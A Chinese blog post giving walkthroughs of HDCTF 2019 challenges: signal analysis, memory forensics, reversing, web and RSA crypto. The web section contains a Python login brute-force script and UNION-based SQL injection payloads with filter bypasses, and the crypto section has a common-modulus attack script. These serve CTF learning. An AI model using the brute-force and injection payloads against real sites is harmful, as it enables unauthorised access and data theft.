站点图标 glzjin

HDCTF 2019 部分题目 WriteUp

比赛地址:http://ctf-hainu.com

难度:大部分中等偏易

由于这是他们学校面向校内的普及性比赛,难度没有设定得太高。但有些题目还是很有意思的。这里记录一下其中一些有意思的题。

一、MISC 杂项

0x01.信号分析

题目:Hackcube 抓到的汽车遥控杆的信号,能看出其中有啥嘛?

提示:不包含同步位

附件:

知识点:信号分析

步骤:

1.先上网搜搜 Hackcube,搜到篇这种东西。主办方后来也放出了这个提示。

https://unicorn.360.com/hackcube/forum.php?mod=viewthread&tid=13&extra=page%3D1

2.根据里面的截图,拿 Audacity 看看。没看到什么。

3.后来主办方给出了提示,波形分析,就尝试打开左边这个菜单切换视图看看。

4.换到波形(dB)时有图像了,分析看看。

5.放大仔细看看,发现每个周期的信号都是大致上一致的,推断为一个内容的信号。

6.然后根据上面那篇帖子里提到了,应该是这种编码方式。两长为 1,两短为 0,先短后长为 F,无效码为先长后短。

7.信号的组成格式如下。

8.那么就来解读一下信号吧,再注意到提示里的无同步码,那么一开始 就是地址码了,解读如下。

9. 将其拼接在一起得 FFFFFFFF0001,md5 之后包上 flag{} 即为 flag。

10. Flag 到手~

0x02.你能发现什么蛛丝马迹吗

题目:藏了点东西进去,能从中发现一些东西吗?

附件:

知识点:内存取证,AES 解密

步骤:

1.对镜像进行分析,发现其中有许许多多文件。

2. 尝试 binwalk -e 对其进行提取,未果。

3. 后来发现这个文件为 128M,看起来像内存的大小,那么就看看怎么对其进行分析。上网搜索之后发现可以用 volatility 来对其进行分析。我懒得在 Mac 下装了,就直接切到自带这个工具的 Kali Linux 了。

4.来首先让这个玩意儿来分析一下镜像。

5. Windows 2003 的,那么就指定 profile 为 Win2003SP2x86 来扫描一下进程吧。

volatility -f memory.img –profile=Win2003SP2x86 psscan

6.可以看到只有一个 DumpIt.exe 是最近创建的。上网一搜发现这个就是内存取证的工具,再来从其他方面看看。来看看屏幕截图吧。

mkdir win2003

volatility -f memory.img –profile=Win2003SP2x86 screenshot –dump-dir=./win2003

这样就会把截图输出到 win2003。

只有这一个文件有内容。

7.打开有内容的截图看看,发现似乎打开了一个 flag.png 的窗口。看起来像 Windows 图片查看器- -?可惜乱码了。

8.那么再来读取一下文件列表看看有这个文件没。

volatility -f memory.img –profile=Win2003SP2x86 filescan|grep flag

9.啊哈,有,那么我们按照这个地址来导出文件试试。

volatility -f memory.img –profile=Win2003SP2x86 dumpfiles -Q 0x000000000484f900 -D win2003/

10.打开导出之后的文件看看。

是个二维码,扫描看看,为如下内容:

jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=

解码之后意义不明,暂时搁置。

11.再来看看系统里的窗口列表。

volatility -f memory.img –profile=Win2003SP2x86 windows

看到 flag.png 是由 explorer.exe 进程里的 Windows 图片查看器打开的。(Windows 用得少不知道这个了- -)

12.那么我们来尝试 dump 一下 explorer.exe 这个进程的内存试试,pid 为 1992。

volatility -f memory.img --profile=Win2003SP2x86 memdump -p 1992 -D ./win2003/

13.ok,那么再对 dump 出来的内容恢复文件试试。试了试 binwalk 效果不好,来试试 foremost。

cd win2003

foremost 1992.dmp

14.来看看 png 那个目录。

除了之前找到的二维码,还有 key 和 iv。

15.那么就判定是 aes 加密了。按照所给的信息

密文:jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=

key: Th1s_1s_K3y00000

iv: 1234567890123456

随意找个解密工具 http://tool.chacuo.net/cryptaes 解密看看:

16.Flag 到手~

二、Reverse 逆向

0x01. MFC

题目:直接看附件吧。

附件:

知识点:MFC,动态分析

原题以及 WP: https://bbs.pediy.com/thread-250802.htm

步骤:

1.先切到 Windows,然后在上面运行这个程序。

2.然后打开彗星小助手的窗口 SPY,来分析一下这个窗口。

3.窗口类名有点怪,留着。

944c8d100f82f0c18b682f63e4dbaa207a2f1e72581c2f1b

转成 text 也没结果。

4.再用 xspy 分析分析窗口。

5. 0464 这个消息有点意思,来发一个试试。回到彗星小助手,点击常用操作–>发送消息,填好信息点击发送。注意 0464 是十六进制表示,我们将其转为十进制就是 1124。

发送完毕,可以看到这个 Des key 了。

{I am a Des key}

6.推测上面那串东西是密文,那么就利用下面的信息来解密试试。

DES 密文:944c8d100f82f0c18b682f63e4dbaa207a2f1e72581c2f1b

DES 密钥:{I am a Des key}

7.找了个网站来解密。https://www.tools4noobs.com/online_tools/decrypt/

包上 flag{} 提交。

8.Flag 到手~

0x02.Maze

题目:找出花指令之后的迷宫

附件:

知识点:去壳,动/静态分析

步骤:

1.继续切到 Windows,发现其为命令行程序。

一闪而过。到 cmd 里打开看看。

2.然后用 peid 来看看有没有壳。

3.有 UPX 的壳,那拿 用 UPX Easy GUI 来脱个壳。

4.脱完壳, IDA 走一波。似乎 F5 转不了。

5.Never mind,我们可以看到这里似乎是接收 14 个字符。

6.再来看看下面的字符串部分,哟,这是啥。

7.似乎跟迷宫沾边儿了。那就用 Linux / Unix 下的 strings 命令来找找字符串吧。

strings maze*.exe

8.拷贝下来,还原迷宫,原则很简单,还原出来为矩形,+ 和 F 周围保证能有豁口(空格)即可,这样才不是死迷宫。

还原出来如下:

9. 用 UDLR 来表示上下左右,那么路线就描述为:

DDLLLDLLDDRRRU

10.输进去不对。也是呢- -咱们似乎还得看看程序。

11.IDA 下面似乎还是有花指令,OD 也看不出端倪。只看到有分支,但真正的分支判断看不出来。那就猜吧。

12.最后猜到 wsad 来表示上下左右的时候,可行。

13. Flag 到手~

三、Web

0x01.sql注入

题目:看靶机吧

靶机:http://twobloom.club/

知识点:爆破,sql 注入

步骤:

1.打开靶机,是这样一个页面。

2.看看源码,有个 hint “试试 hash”。

3.再打开那个登录页面,发现其提示密码为四位数字,再结合试试 hash,估计是得 md5了。

4.不磨叽,抓包,上脚本爆破。

import hashlib

import requests

url = "http://twobloom.club/login.php"


def test(password="0000"):
    payload = "username=admin&password=" + hashlib.md5(password.encode()).hexdigest()
    headers = {
        'Content-Type': "application/x-www-form-urlencoded",
        'cache-control': "no-cache",
        'User-Agent': 'glzjin'
    }

    response = requests.request("POST", url, data=payload, headers=headers)

    if response.text.find("密码错误") == -1:
        return True

    return False


for i in range(1, 9999):
    password = str(i)
    for j in range(0, 4 - len(password)):
        password = "0" + password

    print(password)
    if test(password):
        print("Found!")
        break

跑出来了~

5.把 2019 md5 之后作为密码,可以登录了。

6.看下这个地方有没有注入,看来是有的。

7.多次测试,发现如下的 payload 可以绕过限制。

/**/绕空格,order by 闭合后引号。

keywords=a'/**/union/**/select/**/1,2,3/**/order/**/by/**/'

8.那么,就开始造作起来吧。看下有哪些数据库。

keywords=a'/**/union/**/select/**/1,group_concat(schema_name),3/**/from/**/information_schema.SCHEMATA/**/order/**/by/**/'

9.小老弟有 ctf 数据库呀。那来看看有啥表。

注意等于号也被过滤了,用 like 代替。

keywords=a'/**/union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.TABLES/**/where/**/table_schema/**/like/**/'ctf'/**/order/**/by/**/'

10.来看看 flag 表有啥列。

keywords=a'/**/union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.COLUMNS/**/where/**/table_name/**/like/**/'flag'/**/order/**/by/**/'

11. OK,那就来读这一列上的内容了。

12.Flag 到手~

四、CRYPTO 密码学

三道都是 RSA。一个套路,p*q 得到 n 很容易,但从 n 在分解出 p 和 q 就很难了,特别是这两个数都特别大还是质数的时候,分解就很困难了。

RSA 加密的公钥和私钥都由这两个数生成。

所以,只要知道了 p 和 q,RSA 就不再安全了。

0x01.basic rsa

题目:最简单的 RSA 加密。

27565231154623519221597938803435789010285480123476977081867877272451638645710

附件:

知识点:RSA 加密原理。

步骤:

1.先打开这个 python 源码看看。

import gmpy2
from Crypto.Util.number import *
from binascii import a2b_hex,b2a_hex

flag = "*****************"

p = 262248800182277040650192055439906580479
q = 262854994239322828547925595487519915551

e = 65533
n = p*q


c = pow(int(b2a_hex(flag),16),e,n)

print c

2.这感情好,p,q,e全给了,可以得出公钥和私钥了,直接上网找个加解密脚本改改~

https://gist.github.com/JekaDeka/c9b0f5da16625e3c7bd1033356354579

import random
from binascii import a2b_hex, b2a_hex

p = 262248800182277040650192055439906580479
q = 262854994239322828547925595487519915551

n = p * q


def multiplicative_inverse(a, b):
    """Returns a tuple (r, i, j) such that r = gcd(a, b) = ia + jb
    """
    # r = gcd(a,b) i = multiplicitive inverse of a mod b
    #      or      j = multiplicitive inverse of b mod a
    # Neg return values for i or j are made positive mod b or a respectively
    # Iterateive Version is faster and uses much less stack space
    x = 0
    y = 1
    lx = 1
    ly = 0
    oa = a  # Remember original a/b to remove
    ob = b  # negative values from return results
    while b != 0:
        q = a // b
        (a, b) = (b, a % b)
        (x, lx) = ((lx - (q * x)), x)
        (y, ly) = ((ly - (q * y)), y)
    if lx < 0:
        lx += ob  # If neg wrap modulo orignal b
    if ly < 0:
        ly += oa  # If neg wrap modulo orignal a
    # return a , lx, ly  # Return only positive values
    return lx


def gcd(a, b):
    while b != 0:
        a, b = b, a % b
    return a


def generate_keypair(p, q):
    # n = pq
    n = p * q

    # Phi is the totient of n
    phi = (p - 1) * (q - 1)

    # Choose an integer e such that e and phi(n) are coprime
    e = 65533

    # Use Euclid's Algorithm to verify that e and phi(n) are comprime
    g = gcd(e, phi)
    while g != 1:
        e = random.randrange(1, phi)
        g = gcd(e, phi)

    # Use Extended Euclid's Algorithm to generate the private key
    d = multiplicative_inverse(e, phi)

    # Return public and private keypair
    # Public key is (e, n) and private key is (d, n)
    return ((e, n), (d, n))


def encrypt(pk, plaintext):
    # Unpack the key into it's components
    key, n = pk[0]
    print(b2a_hex(plaintext.encode()))
    # Convert each letter in the plaintext to numbers based on the character using a^b mod m
    cipher = pow(int(b2a_hex(plaintext.encode()), 16), key, n)
    # Return the array of bytes
    return cipher


def decrypt(pk, cipher):
    # Unpack the key into it's components
    key, n = pk[1]
    # Convert each letter in the plaintext to numbers based on the character using a^b mod m
    cipher = pow(cipher, key, n)
    # Return the array of bytes
    cipher = a2b_hex(hex(cipher).split('0x')[1])
    return cipher


pk = generate_keypair(p, q)
cipher = 27565231154623519221597938803435789010285480123476977081867877272451638645710
plaintext = decrypt(pk, cipher)
print(plaintext)

3.跑一下~

4.Flag 到手~

0x02.bbbbbbrsa

题目:继续继续。

2373740699529364991763589324200093466206785561836101840381622237225512234632

附件:

知识点:RSA 加密原理

步骤:

1.打开这两个文件看看。

enc:

p = 177077389675257695042507998165006460849
n = 37421829509887796274897162249367329400988647145613325367337968063341372726061
c = ==gMzYDNzIjMxUTNyIzNzIjMyYTM4MDM0gTMwEjNzgTM2UTN4cjNwIjN2QzM5ADMwIDNyMTO4UzM2cTM5kDN2MTOyUTO5YDM0czM3MjM

encode(1).py

from base64 import b64encode as b32encode
from gmpy2 import invert,gcd,iroot
from Crypto.Util.number import *
from binascii import a2b_hex,b2a_hex
import random

flag = "******************************"

nbit = 128

p = getPrime(nbit)
q = getPrime(nbit)
n = p*q

print p
print n

phi = (p-1)*(q-1)

e = random.randint(50000,70000)

while True:
	if gcd(e,phi) == 1:
		break;
	else:
		e -= 1;

c = pow(int(b2a_hex(flag),16),e,n)

print b32encode(str(c))[::-1]

e 是 50000~70000 随机的。

2.ok, 有 n 和 p 就可以求出 q 了。然后 e 那里爆破一下吧。特别注意,Python 在处理这种超大数除法的时候会有精度问题,需要调库或者自己实现。这里我去网上找了个实现。

https://blog.csdn.net/cidplp/article/details/16902983

import random
from binascii import a2b_hex, b2a_hex
from base64 import b64encode as b32encode


def hdiv(dividend, divisor, precision=0):
    """高精度计算除法,没有四舍五入

    @author: cidplp

    @param dividend:被除数
    @type dividend:int
    @param divisor:除数
    @type divisor:int
    @param precision:小数点后精度
    @type precision:int
    @return:除法结果
    @rtype:str
    """

    if isinstance(precision, int) == False or precision < 0:
        print('精度必须为非负整数')
        return

    a = dividend
    b = divisor

    # 有负数的话做个标记
    if abs(a + b) == abs(a) + abs(b):
        flag = 1
    else:
        flag = -1

        # 变为正数,防止取模的时候有影响
    a = abs(a)
    b = abs(b)

    quotient = a // b
    remainder = a % b

    if remainder == 0:
        return quotient

    ans = str(quotient) + '.'

    i = 0
    while i < precision:
        a = remainder * 10
        quotient = a // b
        remainder = a % b
        ans += str(quotient)
        if remainder == 0:
            break
        i += 1

    if precision == 0:
        ans = ans.replace('.', '')

    if flag == -1:
        ans = '-' + ans

    return ans

p = 177077389675257695042507998165006460849
n = 37421829509887796274897162249367329400988647145613325367337968063341372726061
q = hdiv(n, p)


def gcd(a, b):
    while b != 0:
        a, b = b, a % b
    return a


def multiplicative_inverse(a, b):
    """Returns a tuple (r, i, j) such that r = gcd(a, b) = ia + jb
    """
    # r = gcd(a,b) i = multiplicitive inverse of a mod b
    #      or      j = multiplicitive inverse of b mod a
    # Neg return values for i or j are made positive mod b or a respectively
    # Iterateive Version is faster and uses much less stack space
    x = 0
    y = 1
    lx = 1
    ly = 0
    oa = a  # Remember original a/b to remove
    ob = b  # negative values from return results
    while b != 0:
        q = a // b
        (a, b) = (b, a % b)
        (x, lx) = ((lx - (q * x)), x)
        (y, ly) = ((ly - (q * y)), y)
    if lx < 0:
        lx += ob  # If neg wrap modulo orignal b
    if ly < 0:
        ly += oa  # If neg wrap modulo orignal a
    # return a , lx, ly  # Return only positive values
    return lx


def generate_keypair(p, q, i):
    # n = pq
    n = p * q

    # Phi is the totient of n
    phi = (p - 1) * (q - 1)

    # Choose an integer e such that e and phi(n) are coprime
    e = i

    # Use Extended Euclid's Algorithm to generate the private key
    d = multiplicative_inverse(e, phi)

    # Return public and private keypair
    # Public key is (e, n) and private key is (d, n)
    return ((e, n), (d, n))


def encrypt(pk, plaintext):
    # Unpack the key into it's components
    key, n = pk[0]
    # Convert each letter in the plaintext to numbers based on the character using a^b mod m
    cipher = pow(int(b2a_hex(plaintext.encode()), 16), key, n)
    # Return the array of bytes
    return cipher


def decrypt(pk, cipher):
    try:
        # Unpack the key into it's components
        key, n = pk[1]
        # Convert each letter in the plaintext to numbers based on the character using a^b mod m
        cipher = pow(cipher, key, n)
        # Return the array of bytes
        cipher = a2b_hex(hex(cipher).split('0x')[1])
        return cipher
    except:
        return None


cipher = 2373740699529364991763589324200093466206785561836101840381622237225512234632

phi = (p - 1) * (q - 1)
for i in range(0, 70001):
    if gcd(i, phi) == 1:
        pk = generate_keypair(p, q, i)
        plaintext = decrypt(pk, cipher)

        if plaintext is not None:
            try:
                if plaintext.decode().find('flag') != -1:
                    print(plaintext)
            except:
                pass
    else:
        continue

能正确解密并有 flag 字符的就是我们需要的,cipher 那里为上面的 enc 文件里的cipher 倒置之后的 base64解码数据。

3.跑一下~

4.Flag 到手~

0x03.together

题目:看附件吧。

附件:

知识点:RSA 共模攻击

参考:https://www.jianshu.com/p/2d95bdd0fb0d

步骤:

1.打开文件看看。

pubkey1.pem:

-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQB1qLiqKtKVDprtS+NGGN++
q7jLqDJoXMlPRRczMBAGJIRsz5Dzwtt1ulr0s5yu8RdaufiYeU6sYIKk92b3yygL
FvaYCzjdqBF2EyTWGVE7PL5lh3rPUfxwQFqDR8EhIH5x+Ob8rjlkftIjHTBt1ThJ
JXvDBumXpQKGcBIknRaR9dwR1q8GU58/gIk5ND3eCTAadhrhLByWkHbFArxalx4Q
q8s2ZUe8lDc/N6V93EOFjbKbqqqtDmhniF6jdXQDAIwWTpx6+jmzxlCJoVHd2MBs
ZCcQhvklWtuKz4IYL4+iUpMKGHlhY1vCqFx2EzD4XIljFLP9rk7+9+CoyTuIVL/D
AgMACR0=
-----END PUBLIC KEY-----

pubkey2.pem:

-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQB1qLiqKtKVDprtS+NGGN++
q7jLqDJoXMlPRRczMBAGJIRsz5Dzwtt1ulr0s5yu8RdaufiYeU6sYIKk92b3yygL
FvaYCzjdqBF2EyTWGVE7PL5lh3rPUfxwQFqDR8EhIH5x+Ob8rjlkftIjHTBt1ThJ
JXvDBumXpQKGcBIknRaR9dwR1q8GU58/gIk5ND3eCTAadhrhLByWkHbFArxalx4Q
q8s2ZUe8lDc/N6V93EOFjbKbqqqtDmhniF6jdXQDAIwWTpx6+jmzxlCJoVHd2MBs
ZCcQhvklWtuKz4IYL4+iUpMKGHlhY1vCqFx2EzD4XIljFLP9rk7+9+CoyTuIVL/D
AgJbJQ==
-----END PUBLIC KEY-----

myflag1:

R3Noy6r3WLItytAmb4FmHEygoilucEEZbO9ZYXx5JN03HNpBLDx7fXd2fl+UL5+11RCs/y0qlTGURWWDtG66eNLzGwNpAKiVj6I7RtUJl2Pcm3NvFeAFwI9UsVREyh7zIV6sI9ZP8l/2GVDorLAz5ULW+f0OINGhJmZm8FL/aDnlfTElhQ87LPicWpXYoMtyr6WrxjK6Ontn8BqCt0EjQ7TeXZhxIH9VTPWjDmFdmOqaqdVIT+LZemTgLNESwM5nn4g5S3aFDFwj1YiDYl0/+8etvKfOrfoKOwR0CxsRHagwdUUTES8EcHLmMGCxCkDZn3SzmmA6Nb3lgLeSgG8P1A==

myflag2:

O+rRCXI3aTB6P1rYIOPUdalUp6ujpwEq4I20CoWA+HIL8xxGtqY6N5gpr0guZv9ZgOEAMFnBxOqMdVNnB9GgnhmXtt1ZWydPqIcHvlfwpd/Lyd0XSjXnjaz3P3vOQvR71cD/uXyBA0XPzmnTIMgEhuGJVFm8min0L/2qI7wg/Z7w1+4mOmi655JIXeCiG23ukDv6l9bZuqfGvWCa1KKXWDP31nLbp0ZN2obUs6jEAa1qVTaX6M4My+sks+0VvHATrAUuCrmMwVEivqIJ/nS6ymGVERN6Ohnzyr168knEBKOVj0FAOx3YLfppMM+XbOGHeqdKJRLpMvqFXDMGQInT3w==

两个公钥,两段密文。

2.先用 RsaCtfTool 看看两个公钥。

前面那个 1:

e:2333

后面那个 2:

e:23333

3.OK,n相同,e 不同,共模攻击,上脚本了。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, gmpy, base64


def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)


def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m


def pad_even(x):  # 重要!凑齐2位,将0x1 变成 0x01
    return ('', '0')[len(x) % 2] + x


def CipherB2n(c):  # 将base64编码后的密文转成数字
    c2 = base64.b64decode(c)
    temp = ''
    for i in c2:
        temp += pad_even(str(hex(i))[2:])
    temp = eval('0x' + temp)
    return (temp)


def CipherN2b(m):  # 将数字转换成ascii
    hex_m = hex(m)[2:]
    if hex_m[-1] == 'L':
        hex_m = hex_m[:-1]
    return hex_m


if __name__ == '__main__':

    sys.setrecursionlimit(1000000)
    e1 = 2333  # 根据分解结果
    e2 = 23333  # 根据分解结果
    s = egcd(e1, e2)
    s1 = s[1]
    s2 = s[2]
    c1 = 'R3Noy6r3WLItytAmb4FmHEygoilucEEZbO9ZYXx5JN03HNpBLDx7fXd2fl+UL5+11RCs/y0qlTGURWWDtG66eNLzGwNpAKiVj6I7RtUJl2Pcm3NvFeAFwI9UsVREyh7zIV6sI9ZP8l/2GVDorLAz5ULW+f0OINGhJmZm8FL/aDnlfTElhQ87LPicWpXYoMtyr6WrxjK6Ontn8BqCt0EjQ7TeXZhxIH9VTPWjDmFdmOqaqdVIT+LZemTgLNESwM5nn4g5S3aFDFwj1YiDYl0/+8etvKfOrfoKOwR0CxsRHagwdUUTES8EcHLmMGCxCkDZn3SzmmA6Nb3lgLeSgG8P1A=='
    c2 = 'O+rRCXI3aTB6P1rYIOPUdalUp6ujpwEq4I20CoWA+HIL8xxGtqY6N5gpr0guZv9ZgOEAMFnBxOqMdVNnB9GgnhmXtt1ZWydPqIcHvlfwpd/Lyd0XSjXnjaz3P3vOQvR71cD/uXyBA0XPzmnTIMgEhuGJVFm8min0L/2qI7wg/Z7w1+4mOmi655JIXeCiG23ukDv6l9bZuqfGvWCa1KKXWDP31nLbp0ZN2obUs6jEAa1qVTaX6M4My+sks+0VvHATrAUuCrmMwVEivqIJ/nS6ymGVERN6Ohnzyr168knEBKOVj0FAOx3YLfppMM+XbOGHeqdKJRLpMvqFXDMGQInT3w=='
    c1 = CipherB2n(c1)
    c2 = CipherB2n(c2)
    # print hex(c1)
    n = 14853081277902411240991719582265437298941606850989432655928075747449227799832389574251190347654658701773951599098366248661597113015221566041305501996451638624389417055956926238595947885740084994809382932733556986107653499144588614105694518150594105711438983069306254763078820574239989253573144558449346681620784979079971559976102366527270867527423001083169127402157598183442923364480383742653117285643026319914244072975557200353546060352744263637867557162046429886176035616570590229646013789737629785488326501654202429466891022723268768841320111152381619260637023031430545168618446134188815113100443559425057634959299  # 共n
    if s1 < 0:
        s1 = - s1
        c1 = modinv(c1, n)
    elif s2 < 0:
        s2 = - s2
        c2 = modinv(c2, n)
    m = (pow(c1, s1, n) * pow(c2, s2, n)) % n
    print(m)
    print(CipherN2b(m))

4.跑一下

5.将 hex 转为 text

6.Flag 到手~

退出移动版